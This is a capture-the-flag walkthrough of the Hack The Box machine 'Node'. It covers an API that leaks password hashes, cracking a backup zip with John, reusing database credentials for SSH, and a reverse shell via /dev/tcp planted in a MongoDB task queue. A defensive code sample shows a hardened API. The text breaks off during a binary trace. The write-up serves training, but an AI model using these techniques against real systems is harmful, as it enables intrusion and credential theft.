Hackthebox Node Walkthrough

Initial Enumeration
Port Scan
sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.10.10.58
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-30 19:43 EDT
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 24.10% done; ETC: 19:43 (0:00:09 remaining)
Nmap scan report for 10.10.10.58
Host is up (0.049s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
$ sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.10.10.58
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-30 19:57 EDT
Nmap scan report for 10.10.10.58
Host is up.
All 65535 scanned ports on 10.10.10.58 are open|filtered
Vulnerability Scan
┌──(rocky㉿kali)-[~/hckbox/node]
└─$ nmap -Pn -p 22,3000 -sC -sV -oN details.txt 10.10.10.58
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-30 20:04 EDT
Nmap scan report for 10.10.10.58
Host is up (0.049s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see 2 ports open, and on port 3000 a web application is running (nmap fingerprints it as Apache Hadoop, but the HTTP title is MyPlace). This is how the page looks on port 3000:

Directory Scan
gobuster dir -u http://10.10.10.58:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --wildcard
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.58:3000
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/30 20:19:36 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 200) [Size: 3861]
/index (Status: 200) [Size: 3861]
/2006 (Status: 200) [Size: 3861]
/download (Status: 200) [Size: 3861]
/serial (Status: 200) [Size: 3861]
/crack (Status: 200) [Size: 3861]
/full (Status: 200) [Size: 3861]
/warez (Status: 200) [Size: 3861]
/news (Status: 200) [Size: 3861]
/contact (Status: 200) [Size: 3861]
/12 (Status: 200) [Size: 3861]
/about (Status: 200) [Size: 3861]
/search (Status: 200) [Size: 3861]
/spacer (Status: 200) [Size: 3861]
/privacy (Status: 200) [Size: 3861]
/11 (Status: 200) [Size: 3861]
/logo (Status: 200) [Size: 3861]
Since it returns a large number of directories, you can also run the scan from a GUI tool to get a visual view, which helps to understand the tree structure of the website.

Or, for easier review, write the output to a file using the -o flag:
gobuster dir -u http://10.10.10.58:3000/ -w /usr/share/wordlists/dirb/common.txt -o directory.txt
None of these directories gave any hint for an exploit. I thought of brute-forcing the login and tried all 3 usernames mentioned on the website page, but it reports that none of the usernames are valid.

After checking the HTTP requests through Burp, the website turns out to run on Express, a Node.js web framework that serves the site's API. You can see in Burp that the page's JavaScript makes many API requests when we access the site.

If you analyze each user request in Burp (tom, mark), you can see "is_admin" marked as false.

I could not find any valid usernames from the GUI, so I decided to use curl requests. To do this we need to know the program structure (how the Express application handles the API requests for this website).
In Burp we can see how the user profile requests are handled:

Using curl I can look at these users more specifically:
└─$ curl -s 10.10.10.58:3000/api/users/tom
{"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false}
┌──(rocky㉿kali)-[~]
└─$ curl -s 10.10.10.58:3000/api/users/mark
{"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false}
For all users displayed on the website, the curl request shows the following:
$ curl -s 10.10.10.58:3000/api/users/latest
[{"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},{"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},{"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}]
All the users are marked with "is_admin" false in the above request. I removed "latest" from the query above to see whether any hidden users and passwords are shown:
curl -s 10.10.10.58:3000/api/users/
[{"_id":"59a7365b98aa325cc03ee51c","username":"myP14ceAdm1nAcc0uNT","password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af","is_admin":true},{"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},{"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},{"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}]
curl -s 10.10.10.58:3000/api/users/myP14ceAdm1nAcc0uNT
{"_id":"59a7365b98aa325cc03ee51c","username":"myP14ceAdm1nAcc0uNT","password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af","is_admin":true}
We have found a new user, whose hash we need to crack. I used the crackstation website and the hashes were cracked as follows:

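The defect behind this step is an API that hands out every user document, password hash and admin flag included, to anyone who asks. The following is an added example, not the box's app.js: the listing route as the box exposes it, beside a hardened version. It is written as plain handler functions so it runs without Express; the Express wiring, the req.session shape, and the sample users (shortened fake ids and hashes) are assumptions.

```javascript
// Constructed sample data modelled on the API responses above
// (ids and hashes are shortened fakes).
const USERS = [
  { _id: 'id-0', username: 'myP14ceAdm1nAcc0uNT', password: 'dffc504a...', is_admin: true },
  { _id: 'id-1', username: 'tom', password: 'f0e2e750...', is_admin: false },
  { _id: 'id-2', username: 'mark', password: 'de5a1adf...', is_admin: false },
];

// Insecure: no session check, and every document is returned verbatim,
// password hash and is_admin flag included. This is what GET /api/users/ did.
function listUsersInsecure(req) {
  return { status: 200, body: USERS };
}

// Projection applied to anything that leaves the server: never the hash.
function publicView(user) {
  return { _id: user._id, username: user.username, is_admin: user.is_admin };
}

// Resolve the calling user from the (assumed) session object.
function callerOf(req) {
  const session = req.session || {};
  return session.username ? USERS.find(u => u.username === session.username) : undefined;
}

// Hardened listing: an authenticated admin session is required, and the
// password field is projected out even then.
function listUsersHardened(req) {
  const caller = callerOf(req);
  if (!caller) return { status: 401, body: { error: 'authentication required' } };
  if (!caller.is_admin) return { status: 403, body: { error: 'admin only' } };
  return { status: 200, body: USERS.map(publicView) };
}

// Hardened per-user lookup (GET /api/users/:username): a user may read
// their own record, an admin may read anyone's, and the hash is never returned.
function getUserHardened(req) {
  const caller = callerOf(req);
  if (!caller) return { status: 401, body: { error: 'authentication required' } };
  const wanted = (req.params || {}).username;
  if (!caller.is_admin && caller.username !== wanted) {
    return { status: 403, body: { error: 'forbidden' } };
  }
  const user = USERS.find(u => u.username === wanted);
  if (!user) return { status: 404, body: { error: 'not found' } };
  return { status: 200, body: publicView(user) };
}
```

The authorization check and the projection are separate fixes: even an admin-only route should not return hashes. The 64-hex-character hashes being crackable on crackstation points at an unsalted fast hash as the second defect; a password hash such as bcrypt or Argon2 is the fix for that part.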
The downloaded backup file is not readable, so I decoded it with base64, and it is still not readable:
┌──(rocky㉿kali)-[~/hckbox/node]
└─$ cat myplace.backup | base64 -d > newbackup.decoded
To view the properties of the decoded file:
└─$ file newbackup.decoded
newbackup.decoded: Zip archive data, at least v1.0 to extract
Let's rename it to a zip file now and unzip it:
┌──(rocky㉿kali)-[~/hckbox/node]
└─$ mv newbackup.decoded newbackup.zip
┌──(rocky㉿kali)-[~/hckbox/node]
└─$ unzip newbackup.zip
Archive: newbackup.zip
creating: var/www/myplace/
[newbackup.zip] var/www/myplace/package-lock.json password:
This requires a password, and we need to crack the zip with John to get the password.
As this is a zip file, we need to use John's zip2john script to convert it to a hash. The scripts are usually located under /usr/share/john.
The first command gives a lot of warnings:
┌──(rocky㉿kali)-[/usr/share/john]
└─$ sudo zip2john ~/hckbox/node/newbackup.zip > ~/hckbox/node/newbackup.hashes
[sudo] password for rocky:
newbackup.zip/var/www/myplace/ is not encrypted!
ver 1.0 /home/rocky/hckbox/node/newbackup.zip/var/www/myplace/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/package-lock.json PKZIP Encr: 2b chk, TS_chk, cmplen=4404, decmplen=21264, crc=37EF7D4C
ver 1.0 /home/rocky/hckbox/node/newbackup.zip/var/www/myplace/node_modules/ is not encrypted, or stored with non-handled compression type
ver 1.0 /home/rocky/hckbox/node/newbackup.zip/var/www/myplace/node_modules/serve-static/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/serve-static/README.md PKZIP Encr: 2b chk, TS_chk, cmplen=2733, decmplen=7508, crc=9C88B932
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/serve-static/index.js PKZIP Encr: 2b chk, TS_chk, cmplen=1640, decmplen=4533, crc=211D4438
es/merge-descriptors/LICENSE PKZIP Encr: 2b chk, TS_chk, cmplen=701, decmplen=1167, crc=E5199DFD
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/merge-descriptors/HISTORY.md PKZIP Encr: 2b chk, TS_chk, cmplen=212, decmplen=363, crc=B39B861C
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/merge-descriptors/package.json PKZIP Encr: 2b chk, TS_chk, cmplen=791, decmplen=1973, crc=7DF9E1F4
ver 1.0 /home/rocky/hckbox/node/newbackup.zip/var/www/myplace/node_modules/media-typer/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/media-typer/README.md PKZIP Encr: 2b chk, TS_chk, cmplen=824, decmplen=2371, crc=FC21E3D4
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/media-typer/index.js PKZIP Encr: 2b chk, TS_chk, cmplen=2153, decmplen=6375, crc=954EE4EC
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/media-typer/LICENSE PKZIP Encr: 2b chk, TS_chk, cmplen=654, decmplen=1089, crc=EEDA1571
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/media-typer/HISTORY.md PKZIP Encr: 2b chk, TS_chk, cmplen=238, decmplen=461, crc=831BFF63
/on-finished/HISTORY.md PKZIP Encr: 2b chk, TS_chk, cmplen=671, decmplen=1694, crc=A7755A8F
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/on-finished/package.json PKZIP Encr: 2b chk, TS_chk, cmplen=842, decmplen=1973, crc=69CB31FE
ver 1.0 /home/rocky/hckbox/node/newbackup.zip/var/www/myplace/node_modules/encodeurl/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/encodeurl/README.md PKZIP Encr: 2b chk, TS_chk, cmplen=1358, decmplen=3613, crc=8B7C0973
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/encodeurl/index.js PKZIP Encr: 2b chk, TS_chk, cmplen=776, decmplen=1584, crc=4A7F0ECB
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/encodeurl/LICENSE PKZIP Encr: 2b chk, TS_chk, cmplen=654, decmplen=1089, crc=B05A5771
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/encodeurl/HISTORY.md PKZIP Encr: 2b chk, TS_chk, cmplen=118, decmplen=159, crc=EC7CEBBF
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/encodeurl/package.json PKZIP Encr: 2b chk, TS_chk, cmplen=872, decmplen=2046, crc=2FADFBCD
ver 1.0 /home/rocky/hckbox/node/newbackup.zip/var/www/myplace/node_modules/type-is/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/type-is/README.md PKZIP Encr: 2b chk, TS_chk, cmplen=1480, decmplen=4161, crc=DC8E6598
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/type-is/index.js PKZIP Encr: 2b chk, TS_chk, cmplen=1835, decmplen=5525, crc=D02938BD
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/type-is/LICENSE PKZIP Encr: 2b chk, TS_chk, cmplen=705, decmplen=1172, crc=64AADF93
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/type-is/HISTORY.md PKZIP Encr: 2b chk, TS_chk, cmplen=1077, decmplen=3923, crc=D6966BE8
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/type-is/package.json PKZIP Encr: 2b chk, TS_chk, cmplen=926, decmplen=2206, crc=EAC9E6F2
ver 1.0 /home/rocky/hckbox/node/newbackup.zip/var/www/myplace/node_modules/parseurl/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/parseurl/README.md PKZIP Encr: 2b chk, TS_chk, cmplen=1079, decmplen=3463, crc=C0082F23
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/parseurl/index.js PKZIP Encr: 2b chk, TS_chk, cmplen=886, decmplen=2425, crc=9CEDEE92
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/parseurl/LICENSE PKZIP Encr: 2b chk, TS_chk, cmplen=700, decmplen=1168, crc=5428B6A9
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/parseurl/HISTORY.md PKZIP Encr: 2b chk, TS_chk, cmplen=370, decmplen=832, crc=D36C9E89
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/parseurl/package.json PKZIP Encr: 2b chk, TS_chk, cmplen=870, decmplen=2018, crc=14F24EA9
ver 1.0 /home/rocky/hckbox/node/newbackup.zip/var/www/myplace/node_modules/resolve-from/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/resolve-from/index.js PKZIP Encr: 2b chk, TS_chk, cmplen=294, decmplen=532, crc=EA419ACB
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/resolve-from/package.json PKZIP Encr: 2b chk, TS_chk, cmplen=669, decmplen=1605, crc=6DF22948
les/fresh/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/fresh/README.md PKZIP Encr: 2b chk, TS_chk, cmplen=1336, decmplen=3236, crc=9E3E393F
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/fresh/index.js PKZIP Encr: 2b chk, TS_chk, cmplen=756, decmplen=1740, crc=22ACD7E3
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/fresh/LICENSE PKZIP Encr: 2b chk, TS_chk, cmplen=711, decmplen=1174, crc=F9A49A45
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/fresh/HISTORY.md PKZIP Encr: 2b chk, TS_chk, cmplen=538, decmplen=1220, crc=4209F5B1
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/fresh/package.json PKZIP Encr: 2b chk, TS_chk, cmplen=905, decmplen=2132, crc=2D265872
ver 1.0 /home/rocky/hckbox/node/newbackup.zip/var/www/myplace/node_modules/mime-db/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/mime-db/README.md PKZIP Encr: 2b chk, TS_chk, cmplen=1580, decmplen=3698, crc=7EBAE334
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/mime-db/index.js PKZIP Encr: 2b chk, TS_chk, cmplen=129, decmplen=136, crc=5C777A15
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/mime-db/LICENSE PKZIP Encr: 2b chk, TS_chk, cmplen=664, decmplen=1099, crc=703F5655
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/mime-db/HISTORY.md PKZIP Encr: 2b chk, TS_chk, cmplen=2026, decmplen=7912, crc=4CB89A0D
mongodb-core/lib/connection/logger.js PKZIP Encr: 2b chk, TS_chk, cmplen=1355, decmplen=6219, crc=8FA81201
crc=6BDBF084
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
So use this command to suppress the warnings (stderr is discarded and the hash is written through tee):
┌──(rocky㉿kali)-[/usr/share/john]
└─$ sudo zip2john ~/hckbox/node/newbackup.zip 2>/dev/null | tee ~/hckbox/node/newbackup.hashes
┌──(rocky㉿kali)-[/usr/share/john]
└─$ head ~/hckbox/node/newbackup.hashes
newbackup.zip:$pkzip2$3*2*1*0*8*24*9c88*1223*e0af0f04a36d44530af05c2a7e10141069f4e924d664c5cae80577db1922cdba9f715cae*1*0*8*24*37ef*0145*5559cbc60694621e9f201804b78c8ff7cae08157768c13b80f878f5091f72d7394374bde*2*0*11*5*118f1dfc*94cb*67*0*11*118f*3d0f*3339585e708a5ddb3b65e439900c62bab3*$/pkzip2$::newbackup.zip:var/www/myplace/node_modules/qs/.eslintignore, var/www/myplace/node_modules/serve-static/README.md, var/www/myplace/package-lock.json:/home/rocky/hckbox/node/newbackup.zip
As we can see the format is pkzip. John cracked this fast for me:
sudo john ~/hckbox/node/newbackup.hashes --wordlist=/usr/share/wordlists/rockyou.txt --format=pkzip
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
magicword (newbackup.zip)
1g 0:00:00:00 DONE (2022-04-01 21:53) 50.00g/s 9420Kp/s 9420Kc/s 9420KC/s sandrad..becky101
Use the "--show" option to display all of the cracked passwords reliably
Session completed
We can unzip now with the cracked password. It contains a "var" folder.

Initial shell as Mark
Under the var folder we can see the MongoDB connection string with a password:
ls
app.html app.js node_modules package.json package-lock.json static
┌──(rocky㉿kali)-[~/…/zipstore/var/www/myplace]
└─$ cat app.js
const express = require('express');
const session = require('express-session');
const bodyParser = require('body-parser');
const crypto = require('crypto');
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const path = require("path");
const spawn = require('child_process').spawn;
const app = express();
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
This line seems to have the password for the SSH user mark:
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
ssh mark@10.10.10.58
The authenticity of host '10.10.10.58 (10.10.10.58)' can't be established.
ED25519 key fingerprint is SHA256:l5rO4mtd28sC7Bh8t7rHpUxqmHnGYUDxX1DHmLFrzrk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.58' (ED25519) to the list of known hosts.
mark@10.10.10.58's password:
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
.-.
.-'``(|||)
,`\ \ `-`. 88 88
/ \ '``-. ` 88 88
.-. , `___: 88 88 88,888, 88 88 ,88888, 88888 88 88
(:::) : ___ 88 88 88 88 88 88 88 88 88 88 88
`-` ` , : 88 88 88 88 88 88 88 88 88 88 88
\ / ,..-` , 88 88 88 88 88 88 88 88 88 88 88
`./ / .-.` '88888' '88888' '88888' 88 88 '8888 '88888'
`-..-( )
`-`
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
mark@node:~$ whoami
mark
mark@node:~$ pwd
/home/mark
mark@node:~$
After login, I could not get the user flag. The user flag is placed under user "tom"'s home directory; however, "mark" doesn't have read access to this file.
mark@node:/tmp$ cd /home
mark@node:/home$ cd tom
mark@node:/home/tom$ ls -al
total 40
drwxr-xr-x 6 root root 4096 Sep 3 2017 .
drwxr-xr-x 5 root root 4096 Aug 31 2017 ..
-rw-r--r-- 1 root root 220 Aug 29 2017 .bash_logout
-rw-r--r-- 1 root root 3771 Aug 29 2017 .bashrc
drwx------ 2 root root 4096 Aug 29 2017 .cache
drwxr-xr-x 3 root root 4096 Aug 30 2017 .config
-rw-r----- 1 root root 0 Sep 3 2017 .dbshell
-rwxr-xr-x 1 root root 0 Aug 30 2017 .mongorc.js
drwxrwxr-x 2 root root 4096 Aug 29 2017 .nano
drwxr-xr-x 5 root root 4096 Aug 31 2017 .npm
-rw-r--r-- 1 root root 655 Aug 29 2017 .profile
-rw-r----- 1 root tom 33 Sep 3 2017 user.txt
Privilege escalation to Tom
These are the processes running as "tom":
mark@node:/tmp$ ps aux | grep tom
tom 1217 0.0 4.7 1074616 36356 ? Ssl Apr02 0:14 /usr/bin/node /var/scheduler/app.js
tom 1232 0.6 7.0 1051876 53628 ? Ssl Apr02 9:49 /usr/bin/node /var/www/myplace/app.js
mark 16329 0.0 0.1 14228 1012 pts/1 S+ 01:19 0:00 grep --color=auto tom
The contents of the file "/var/www/myplace/app.js" were already known to us, as it was in the backup we downloaded.
After reviewing the contents of "/var/scheduler/app.js" we get a database name, username and password to connect to the MongoDB database:
cat /var/scheduler/app.js
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';
Connecting to the MongoDB database:
mongo -u mark -p 5AYRft73VtFpc84k scheduler
MongoDB shell version: 3.2.16
connecting to: scheduler
> show collections
tasks
> db.tasks.find()
"db.tasks.find()" shows no objects in the collection. For testing, I am trying to add a command that creates a test file under /tmp using "db.tasks.insert":
> db.tasks.insert({"cmd": "touch /tmp/rchitect"})
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
{ "_id" : ObjectId("6248ee57a5adbbf2bcbcf981"), "cmd" : "touch /tmp/rchitect" }
After 30 seconds the task is gone:
> db.tasks.find()
{ "_id" : ObjectId("6248ee57a5adbbf2bcbcf981"), "cmd" : "touch /tmp/rchitect" }
> db.tasks.find()
>
Now, instead of the touch command, insert a reverse shell command as follows, and we have a reverse shell within 30 seconds:
> db.tasks.insert({"cmd": "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.3/8989 0>&1'"})
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
{ "_id" : ObjectId("6248f1bea5adbbf2bcbcf982"), "cmd" : "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.3/8989 0>&1'" }
Reverse shell as Tom
┌──(rocky㉿kali)-[~]
└─$ rlwrap nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.58] 44328
bash: cannot set terminal process group (1217): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
tom@node:/$
Privilege escalation to root
sudo -l asks for the password of "tom", which I don't have.
The next step was to look for any SUID files:
find / -perm /4000 2> /dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/local/bin/backup
/usr/bin/chfn
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/newuidmap
/bin/ping
/bin/umount
/bin/fusermount
/bin/ping6
/bin/ntfs-3g
/bin/su
/usr/local/bin/backup is not a standard SUID file.
I can also see the user "tom" belongs to an admin group:
id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
The file "/usr/local/bin/backup" also belongs to the group "admin":
ls -al /usr/local/bin/backup
-rwsr-xr-- 1 root admin 16484 Sep 3 2017 /usr/local/bin/backup
$
It is an executable, and this program appears to be what generated the backup we downloaded initially:
/usr/local/bin/
file backup
backup: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=343cf2d93fb2905848a42007439494a2b4984369, not stripped
strings backup
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setuid
strcpy
exit
sprintf
srand
fopen
strncpy
puts
time
clock
getpid
fgets
strstr
strcspn
fclose
strcat
remove
system
geteuid
strchr
access
strcmp
__libc_start_main
__gmon_start__
GLIBC_2.1
GLIBC_2.0
PTRh
WVSQ
Y[^_]
UWVS
t$,U
[^_]
[37m
[33m
%s[!]%s %s
[32m
%s[+]%s %s
%s[+]%s Starting archiving %s
____________________________________________________
/ \
| _____________________________________________ |
| | | |
| | Secure Backup v1.0 | |
| |_____________________________________________| |
| |
\_____________________________________________________/
\_______________________________________/
_______________________________________________
_-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
_-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
_-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
_-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
_-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'
Could not open file
Validated access token
Ah-ah-ah! You didn't say the magic word!
Finished! Encoded backup is below:
/root
/etc
/tmp/.backup_%i
/usr/bin/zip -r -P magicword %s %s > /dev/null
/usr/bin/base64 -w0 %s
The target path doesn't exist
;*2$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7200
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
backup.c
__FRAME_END__
__JCR_END__
I tried to run the "backup" program and it did not work. These are the steps I tried:
backup
backup test1
backup test1
backup test1 test2
backup test1 test2
Finally, with 3 arguments I am able to run it:
backup test1 test2 test3
____________________________________________________
/ \
| _____________________________________________ |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | Secure Backup v1.0 | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| |_____________________________________________| |
| |
\_____________________________________________________/
\_______________________________________/
_______________________________________________
_-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
_-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
_-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
_-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
_-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'
[!] Ah-ah-ah! You didn't say the magic word!
$
To see how this binary works, I used "ltrace":
ltrace backup test1 test2 test3
strncpy(0xffc35a38, "test2", 100) = 0xffc35a38
strcpy(0xffc35a21, "/") = 0xffc35a21
strcpy(0xffc35a2d, "/") = 0xffc35a2d
strcpy(0xffc359b7, "/e") = 0xffc359b7
strcat("/e", "tc") = "/etc"
strcat("/etc", "/m") = "/etc/m"
strcat("/etc/m", "yp") = "/etc/myp"
strcat("/etc/myp", "la") = "/etc/mypla"
strcat("/etc/mypla", "ce") = "/etc/myplace"
strcat("/etc/myplace", "/k") = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey") = "/etc/myplace/key"
